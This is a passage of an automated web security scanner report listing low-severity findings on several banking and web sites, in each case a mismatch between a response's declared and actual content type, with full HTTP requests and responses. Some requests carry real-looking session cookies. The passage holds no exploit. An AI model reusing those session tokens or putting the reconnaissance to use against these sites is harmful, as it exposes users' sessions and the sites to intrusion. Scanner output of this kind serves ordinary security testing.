GET /c?siteID=484&ts=1304436165921&ccID=P_Home_Main&ccID=P_Home_Row2_Left&ccID=P_Home_Row2_Right&ccID=P_Home_Col2&ccID=P_Home_Col3&ccID=P_Home_Col4&log=no&location=http%3A%2F%2Fwww.barclays.co.uk%2FPersonalBanking%2FP1242557947640&tagv=5.3&tz=-300&r=empty&title=Barclays%20Personal%20Banking%20%7C%20ISAs%20%7C%20Barclays%20latest%20ISA%20rates%20-%20Barclays&cd=16&ah=1156&aw=1920&sh=1200&sw=1920&pd=16 HTTP/1.1
Host: tc.barclays.co.uk
Proxy-Connection: keep-alive
Referer: http://www.barclays.co.uk/js//tc_targeting.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WT_FPC=id=2e6a8286f3ae7c7522a1304421997884:lv=1304454124377:ss=1304454071727; mbox=check#true#1304436224|session#1304436163124-351101#1304438024

Response

HTTP/1.1 200 OK
Cache-control: no-cache, private
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
P3P: policyref="http://www.touchclarity.com/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa TAIa PSAa PSDa OUR STP UNI PUR COM NAV INT STA PRE"
Date: Tue, 03 May 2011 10:22:49 GMT
Content-Type: text/javascript; charset=ISO-8859-1
Content-Length: 14039
Last-Modified: Tue, 03 May 2011 10:22:49 GMT
Connection: Keep-Alive
Set-Cookie: TCID=0007af91-b6ee-955e-a561-8bbc00000043;path=/;domain=tc.barclays.co.uk;expires=Fri, 03-May-2013 10:22:49 GMT;
Set-Cookie: NSC_Cbsdmb`tGjstuQbsu`=4454b2367804;expires=Tue, 03-May-11 14:22:49 GMT;path=/

tc_create_content("P_Home_Main","P_Home_Main_PHM3_002",'<div><div class="lt"><div class="m-cont"><ul class="columns"><li class="column first"><h2><a title="Bank" style="color:#003366" onload="dcsMulti
...[SNIP]...

33.21. http://www.bangkokbank.com/Bangkok%20Bank/Pages/Forms/AllItems.aspx  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.bangkokbank.com
Path:   /Bangkok%20Bank/Pages/Forms/AllItems.aspx

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /Bangkok%20Bank/Pages/Forms/AllItems.aspx HTTP/1.1
Host: www.bangkokbank.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _cbclose7180=1; verify=test; _cbclose=1; _ctout7180=1; ASPSESSIONIDCQDDQRCA=CDNLAAIDONLFLNJJKKMMJIGB; _uid7180=55ED3A63.1; ASPSESSIONIDCADTTCQT=HJBJCGIDKBNEBONIDMFMOFBD; visit_time=1591;

Response

HTTP/1.1 401 Unauthorized
Cache-Control: private
Content-Length: 16
Content-Type: text/html; charset=utf-8
X-AspNet-Version: 2.0.50727
WWW-Authenticate: NTLM
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 13:37:35 GMT
Age: 0
Connection: close
Via: HTTP/1.1 BangkokBank.com (0 [cMs f ])

401 UNAUTHORIZED

33.22. http://www.bangkokbank.com/Bangkok%20Bank/_layouts/Authenticate.aspx  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.bangkokbank.com
Path:   /Bangkok%20Bank/_layouts/Authenticate.aspx

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /Bangkok%20Bank/_layouts/Authenticate.aspx HTTP/1.1
Host: www.bangkokbank.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _cbclose7180=1; verify=test; _cbclose=1; _ctout7180=1; ASPSESSIONIDCQDDQRCA=CDNLAAIDONLFLNJJKKMMJIGB; _uid7180=55ED3A63.1; ASPSESSIONIDCADTTCQT=HJBJCGIDKBNEBONIDMFMOFBD; visit_time=1591;

Response

HTTP/1.1 401 Unauthorized
Cache-Control: private
Content-Length: 16
Content-Type: text/html; charset=utf-8
X-AspNet-Version: 2.0.50727
WWW-Authenticate: NTLM
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 13:37:36 GMT
Age: 0
Connection: close
Via: HTTP/1.1 BangkokBank.com (0 [cMs f ])

401 UNAUTHORIZED

33.23. http://www.bangkokbank.com/Bangkok%20Bank/_layouts/viewlsts.aspx  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.bangkokbank.com
Path:   /Bangkok%20Bank/_layouts/viewlsts.aspx

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /Bangkok%20Bank/_layouts/viewlsts.aspx HTTP/1.1
Host: www.bangkokbank.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _cbclose7180=1; verify=test; _cbclose=1; _ctout7180=1; ASPSESSIONIDCQDDQRCA=CDNLAAIDONLFLNJJKKMMJIGB; _uid7180=55ED3A63.1; ASPSESSIONIDCADTTCQT=HJBJCGIDKBNEBONIDMFMOFBD; visit_time=1591;

Response

HTTP/1.1 401 Unauthorized
Cache-Control: private
Content-Length: 16
Content-Type: text/html; charset=utf-8
X-AspNet-Version: 2.0.50727
WWW-Authenticate: NTLM
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 13:37:40 GMT
Age: 0
Connection: close
Via: HTTP/1.1 BangkokBank.com (0 [cMs f ])

401 UNAUTHORIZED

33.24. http://www.bangkokbank.com/Online%20Banking/For%20Personal/iBanking/Pages/Forms/AllItems.aspx  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.bangkokbank.com
Path:   /Online%20Banking/For%20Personal/iBanking/Pages/Forms/AllItems.aspx

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /Online%20Banking/For%20Personal/iBanking/Pages/Forms/AllItems.aspx HTTP/1.1
Host: www.bangkokbank.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _cbclose7180=1; verify=test; _cbclose=1; _ctout7180=1; ASPSESSIONIDCQDDQRCA=CDNLAAIDONLFLNJJKKMMJIGB; _uid7180=55ED3A63.1; ASPSESSIONIDCADTTCQT=HJBJCGIDKBNEBONIDMFMOFBD; visit_time=1591;

Response

HTTP/1.1 401 Unauthorized
Cache-Control: private
Content-Length: 16
Content-Type: text/html; charset=utf-8
X-AspNet-Version: 2.0.50727
WWW-Authenticate: NTLM
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 13:37:48 GMT
Age: 0
Connection: close
Via: HTTP/1.1 BangkokBank.com (0 [cMs f ])

401 UNAUTHORIZED

33.25. http://www.bangkokbank.com/_layouts/NR/BangkokBank/images/homepage/Feature_chinese.jpg  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.bangkokbank.com
Path:   /_layouts/NR/BangkokBank/images/homepage/Feature_chinese.jpg

Issue detail

The response contains the following Content-type statement:The response states that it contains a JPEG image. However, it actually appears to contain a BMP image.

Request

GET /_layouts/NR/BangkokBank/images/homepage/Feature_chinese.jpg HTTP/1.1
Host: www.bangkokbank.com
Proxy-Connection: keep-alive
Referer: http://www.bangkokbank.com/bangkok%20bank/pages/main.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: max-age=31536000
Content-Type: image/jpeg
Last-Modified: Thu, 11 Jun 2009 03:42:17 GMT
Accept-Ranges: bytes
ETag: "80b2a19d46eac91:0"
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 11:31:58 GMT
Age: 787
Proxy-Connection: close
Via: HTTP/1.1 BangkokBank.com (0 [cHs f ])
Content-Length: 6534

BM........6...(...l...............P.....................................................................................................................................................................
...[SNIP]...

33.26. http://www.bangkokbank.com/_layouts/nr/MajorRates/ratebanner.css  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.bangkokbank.com
Path:   /_layouts/nr/MajorRates/ratebanner.css

Issue detail

The response contains the following Content-type statement:The response states that it contains CSS. However, it actually appears to contain HTML.

Request

GET /_layouts/nr/MajorRates/ratebanner.css HTTP/1.1
Host: www.bangkokbank.com
Proxy-Connection: keep-alive
Referer: http://www.bangkokbank.com/_layouts/nr/MajorRates/MainBannerRss.htm
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDCQDDQRCA=CDNLAAIDONLFLNJJKKMMJIGB; ASPSESSIONIDCADTTCQT=NFGICGIDOHJAODGEJHPJHDHE

Response

HTTP/1.1 200 OK
Cache-Control: max-age=31536000
Content-Type: text/css
Last-Modified: Thu, 11 Jun 2009 03:46:33 GMT
Accept-Ranges: bytes
ETag: "8032383647eac91:0"
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 11:44:53 GMT
Age: 0
Proxy-Connection: close
Via: HTTP/1.1 BangkokBank.com (0 [cMsSf ])
Content-Length: 3759

<style type="text/css">

.Title1 {
   font-size: xx-small;
   font-weight: bold;
   color: #FFFFFF;
}
.Title2 {
   font-size: xx-small;
   font-weight: bold;
   color: #333333;
}
.Show1 {
   font-size:
...[SNIP]...

33.27. http://www.barclays.co.uk/cs/Satellite  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.barclays.co.uk
Path:   /cs/Satellite

Issue detail

The response contains the following Content-type statement:The response states that it contains a GIF image. However, it actually appears to contain a JPEG image.

Request

GET /cs/Satellite?blobcol=urldata&blobkey=id&blobtable=MungoBlobs&blobwhere=1259971692409&ssbinary=true HTTP/1.1
Host: www.barclays.co.uk
Proxy-Connection: keep-alive
Referer: http://www.barclays.co.uk/PersonalBanking/P1242557947640
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WT_FPC=id=2e6a8286f3ae7c7522a1304421997884:lv=1304454124377:ss=1304454071727; mbox=check#true#1304436224|session#1304436163124-351101#1304438024

Response

HTTP/1.1 200 OK
Server: BLUE
Date: Tue, 03 May 2011 10:22:51 GMT
Content-language: en-GB
Last-modified: Tue, 03 May 2011 09:32:31 GMT
Content-type: image/gif
Set-cookie: JSESSIONID=2776E48E19D2EE061B3808C2128F1D80; Path=/cs; Secure
Content-Length: 36305

......JFIF.....H.H.....C................
....
.        
       ......................................C...........................................................................................................
...[SNIP]...

33.28. http://www.barclays.co.uk/images/premier_league_masthead.jpg  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.barclays.co.uk
Path:   /images/premier_league_masthead.jpg

Issue detail

The response contains the following Content-type statement:The response states that it contains a JPEG image. However, it actually appears to contain a GIF image.

Request

GET /images/premier_league_masthead.jpg HTTP/1.1
Host: www.barclays.co.uk
Proxy-Connection: keep-alive
Referer: http://www.barclays.co.uk/PersonalBanking/P1242557947640
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WT_FPC=id=2e6a8286f3ae7c7522a1304421997884:lv=1304454124377:ss=1304454071727; mbox=check#true#1304436224|session#1304436163124-351101#1304438024

Response

HTTP/1.1 200 OK
Server: BLUE
Date: Tue, 03 May 2011 10:22:55 GMT
Content-type: image/jpeg
Last-modified: Fri, 12 Feb 2010 13:25:26 GMT
Content-length: 4357
Etag: "1105-4b7556c6"
Accept-ranges: bytes

GIF89a...................JJz..Ykk.~...4k..................33j...l...    K...DR.dd...T !]......Uj....L]....tt..........5=r......;Fy.....................==qu.....c}...V...........Q...]].......=I{...!..n..e
...[SNIP]...

33.29. http://www.facebook.com/extern/login_status.php  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /extern/login_status.php HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.36.199.107
Connection: close
Date: Tue, 03 May 2011 13:34:13 GMT
Content-Length: 22

Invalid Application ID

33.30. http://www.google.com/search  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.google.com
Path:   /search

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain unrecognised content.

Request

GET /search?sourceid=chrome&ie=UTF-8&q=Bangkok+Bank HTTP/1.1
Host: www.google.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Avail-Dictionary: rU20-FBA
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PREF=ID=0772c9d5ef13aaaf:U=e1fa6a1c985d530f:TM=1303071569:LM=1303430315:S=G3Eo9Ou469J3cHp7; NID=46=HfFdn9n5LQSBV_6qMo8w5eh1JPxJ22N4d7ME-n4CpoG0Pt1fAvuZFMASF-UtF6oB21IuFyfkLpYaH0m_T3hMrA31Aueqwtif5xnsXw2EUw1C8kNgsQLLVpzPIAlyXsyf

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:44:25 GMT
Expires: -1
Cache-Control: private, max-age=0
Content-Type: text/html; charset=UTF-8
Server: gws
X-XSS-Protection: 1; mode=block
Content-Length: 37043

f94-wCe9....S....o...8.......*.....!...<!doctype html> <head> <title>Bangkok Bank - Google Search</title> <script>window.google={kEI:"meq_TdyrB5CDtgfjyKHJBQ",kEXPI:"17259,24472,25907,27147,28514,
...[SNIP]...

33.31. http://www.kasikornbank.com/SiteCollectionDocuments/scripts/start.js  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.kasikornbank.com
Path:   /SiteCollectionDocuments/scripts/start.js

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain unrecognised content.

Request

GET /SiteCollectionDocuments/scripts/start.js HTTP/1.1
Host: www.kasikornbank.com
Proxy-Connection: keep-alive
Referer: http://www.kasikornbank.com/EN/Pages/Default.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: public, max-age=1800
Content-Type: application/x-javascript
ETag: "{112099D2-A779-4526-BEF4-FDC696335874},5589pub"
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 12:24:47 GMT
Content-Length: 509

...KWeb.BindLang();
KWeb.Toolbox.InitLinkHover();
KWeb.PromotionBanner.Start(PromotionBannerScrollNumber, PromotionBannerScrollAuto);
KWeb.KNowBanner.Start(KNowBannerSize, KNowBannerDefaultURL, KNo
...[SNIP]...

33.32. http://www.ktam.co.th/en/news.inc.php  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.ktam.co.th
Path:   /en/news.inc.php

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain unrecognised content.

Request

GET /en/news.inc.php HTTP/1.1
Host: www.ktam.co.th
Proxy-Connection: keep-alive
Referer: http://www.ktam.co.th/en/index.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=e751e0758cd81a354193794d79a5a717

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:52:20 GMT
Server: Apache/1.3.39 (Unix) mod_auth_passthrough/1.8 mod_log_bytes/1.2 mod_bwlimited/1.4 FrontPage/5.0.2.2635.SR1.2 mod_ssl/2.8.30 OpenSSL/0.9.7a PHP-CGI/0.1b
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
X-Powered-By: PHP/4.4.7
Connection: close
Content-Type: text/html
Content-Length: 21042

<meta http-equiv="Content-Type" content="text/html; charset=tis-620">
<link rel="stylesheet" href="style/page.txt" type="text/css">
<style type="text/css">
<!--
.style2 {font-size: 11px}
.style4 {col
...[SNIP]...

33.33. http://www.ktam.co.th/en/style/page.txt  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.ktam.co.th
Path:   /en/style/page.txt

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain CSS.

Request

GET /en/style/page.txt HTTP/1.1
Host: www.ktam.co.th
Proxy-Connection: keep-alive
Referer: http://www.ktam.co.th/en/index.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=e751e0758cd81a354193794d79a5a717

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:52:17 GMT
Server: Apache/1.3.39 (Unix) mod_auth_passthrough/1.8 mod_log_bytes/1.2 mod_bwlimited/1.4 FrontPage/5.0.2.2635.SR1.2 mod_ssl/2.8.30 OpenSSL/0.9.7a PHP-CGI/0.1b
Last-Modified: Wed, 23 May 2007 16:52:12 GMT
ETag: "2b461a-e4a-4654713c"
Accept-Ranges: bytes
Content-Length: 3658
Connection: close
Content-Type: text/plain

body {
   margin: 0px 0px;
   padding: 0px 0px }
table,tr,td {
   0line-height: 15px;
   font-family: Tahoma;
   color: #333333;
   font-size: 12px;
   cursor: default }
a:visited {
   color: #0044CC;
   text-decoratio
...[SNIP]...

33.34. http://www.ktam.co.th/media_box.php  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.ktam.co.th
Path:   /media_box.php

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain XML.

Request

GET /media_box.php?m=64 HTTP/1.1
Host: www.ktam.co.th
Proxy-Connection: keep-alive
Referer: http://www.ktam.co.th/en/index.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=e751e0758cd81a354193794d79a5a717

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:52:19 GMT
Server: Apache/1.3.39 (Unix) mod_auth_passthrough/1.8 mod_log_bytes/1.2 mod_bwlimited/1.4 FrontPage/5.0.2.2635.SR1.2 mod_ssl/2.8.30 OpenSSL/0.9.7a PHP-CGI/0.1b
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
X-Powered-By: PHP/4.4.7
Connection: close
Content-Type: text/html
Content-Length: 538

<OBJECT ID="mediaPlayer" width="205" height="180" CLASSID="CLSID:22d6f312-b0f6-11d0-94ab-0080c74c7e95" CODEBASE="http://activex.microsoft.com/activex/controls/mplayer/en/nsmp2inf.cab#Version=5,1,52,70
...[SNIP]...

33.35. http://www.ktb.co.th/flash/a1.swf  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.ktb.co.th
Path:   /flash/a1.swf

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain a flash object.

Request

GET /flash/a1.swf HTTP/1.1
Host: www.ktb.co.th
Proxy-Connection: keep-alive
Referer: http://www.ktb.co.th/flash_eng/ktbslide_index.swf
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=6029AA1259F59A457FB2F7A2587C8B4E; _cbclose=1; _cbclose6897=1; _uid6897=F468DC21.1; _ctout6897=1; __utmz=54991601.1304441094.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Krung%20Thai%20Bank; __utma=54991601.999704112.1304441094.1304441094.1304441094.1; __utmc=54991601; __utmb=54991601.1.10.1304441094

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:45:10 GMT
Content-length: 12159
Content-type: text/plain
Last-modified: Mon, 23 Aug 2010 09:06:18 GMT
Etag: "2f7f-4c723a0a"
Accept-ranges: bytes

CWS    rC..x..|y<.m..1cL.dl.5...1d_*Kd.c.P..........1.B...TvJ..A..Hd'.H.{.........<.s........9..q...q...r....X.?{....@...P.jG.[Pc.........z.5.8.....F..>...Q.D02!..f$+.....I,l.....X!.....MPTT.........K..
...[SNIP]...

33.36. http://www.ktb.co.th/flash/a2.swf  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.ktb.co.th
Path:   /flash/a2.swf

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain a flash object.

Request

GET /flash/a2.swf HTTP/1.1
Host: www.ktb.co.th
Proxy-Connection: keep-alive
Referer: http://www.ktb.co.th/flash_eng/ktbslide_index.swf
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=6029AA1259F59A457FB2F7A2587C8B4E; _cbclose=1; _cbclose6897=1; _uid6897=F468DC21.1; _ctout6897=1; __utmz=54991601.1304441094.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Krung%20Thai%20Bank; __utma=54991601.999704112.1304441094.1304441094.1304441094.1; __utmc=54991601; __utmb=54991601.1.10.1304441094

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:45:10 GMT
Content-length: 49454
Content-type: text/plain
Last-modified: Mon, 23 Aug 2010 09:06:18 GMT
Etag: "c12e-4c723a0a"
Accept-ranges: bytes

CWS    ....x...eP\a.688.......=....C.2.>..\..ww.A..@ .............|.o........?..N......O.9W_.    .`.~...z............(....-....... ........d...$...6.X.....%.<.3...0..-.......LMIU    .......#
.........&.%$z.
...[SNIP]...

33.37. http://www.ktb.co.th/flash/a3.swf  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.ktb.co.th
Path:   /flash/a3.swf

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain a flash object.

Request

GET /flash/a3.swf HTTP/1.1
Host: www.ktb.co.th
Proxy-Connection: keep-alive
Referer: http://www.ktb.co.th/flash_eng/ktbslide_index.swf
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=6029AA1259F59A457FB2F7A2587C8B4E; _cbclose=1; _cbclose6897=1; _uid6897=F468DC21.1; _ctout6897=1; __utmz=54991601.1304441094.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Krung%20Thai%20Bank; __utma=54991601.999704112.1304441094.1304441094.1304441094.1; __utmc=54991601; __utmb=54991601.1.10.1304441094

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:45:11 GMT
Content-length: 122987
Content-type: text/plain
Last-modified: Mon, 23 Aug 2010 09:06:18 GMT
Etag: "1e06b-4c723a0a"
Accept-ranges: bytes

CWS    "...x.|zuP.>......./..-V......R..............r......s/.d&o.|.Mf..$..h......@
......o.....pQfP.(..........$.
..0.W.......&6..x......P.L.......F.>.._......*,..........G@........3""...(...8X8Dxx
...[SNIP]...

33.38. http://www.ktb.co.th/flash/b1.swf  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.ktb.co.th
Path:   /flash/b1.swf

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain a flash object.

Request

GET /flash/b1.swf HTTP/1.1
Host: www.ktb.co.th
Proxy-Connection: keep-alive
Referer: http://www.ktb.co.th/flash_eng/ktbslide_index.swf
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=6029AA1259F59A457FB2F7A2587C8B4E; _cbclose=1; _cbclose6897=1; _uid6897=F468DC21.1; _ctout6897=1; __utmz=54991601.1304441094.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Krung%20Thai%20Bank; __utma=54991601.999704112.1304441094.1304441094.1304441094.1; __utmc=54991601; __utmb=54991601.1.10.1304441094

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:45:21 GMT
Content-length: 26776
Content-type: text/plain
Last-modified: Mon, 23 Aug 2010 09:06:22 GMT
Etag: "6898-4c723a0e"
Accept-ranges: bytes

CWS    .}..x...wPS..7.... EP...P".....H....\E......U...H.B RB....B.J......H    %..;..g...<......g........:..>{.93.O..7.....DN..r.~...._.8...8.....8.q..plhl.8u.?..n'.........?{..y.......eq\..~..e._.....].
...[SNIP]...

33.39. http://www.ktb.co.th/flash/b2.swf  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.ktb.co.th
Path:   /flash/b2.swf

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain a flash object.

Request

GET /flash/b2.swf HTTP/1.1
Host: www.ktb.co.th
Proxy-Connection: keep-alive
Referer: http://www.ktb.co.th/flash_eng/ktbslide_index.swf
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=6029AA1259F59A457FB2F7A2587C8B4E; _cbclose=1; _cbclose6897=1; _uid6897=F468DC21.1; _ctout6897=1; __utmz=54991601.1304441094.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Krung%20Thai%20Bank; __utma=54991601.999704112.1304441094.1304441094.1304441094.1; __utmc=54991601; __utmb=54991601.1.10.1304441094

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:45:24 GMT
Content-length: 104240
Content-type: text/plain
Last-modified: Mon, 23 Aug 2010 09:06:22 GMT
Etag: "19730-4c723a0e"
Accept-ranges: bytes

